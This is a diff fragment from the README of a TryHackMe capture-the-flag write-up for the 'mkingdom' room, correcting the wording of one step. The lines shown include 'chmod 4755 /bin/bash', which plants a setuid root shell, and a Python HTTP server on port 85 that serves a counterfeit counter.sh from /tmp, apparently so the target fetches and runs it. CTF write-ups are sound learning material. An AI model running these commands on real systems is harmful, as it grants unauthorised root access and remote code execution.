twhelan25/tryhackme-CTF-writeup-for-mkingdom/README.md

 chmod 4755 /bin/bash
 ```
-Then set up the sever on port 85 directing to our counterfit counter.sh:
+Then set up the sever on port 85 directing to our counterfit version of counter.sh:
 ```bash
 sudo python3 -m http.server 85 --directory /tmp
 ```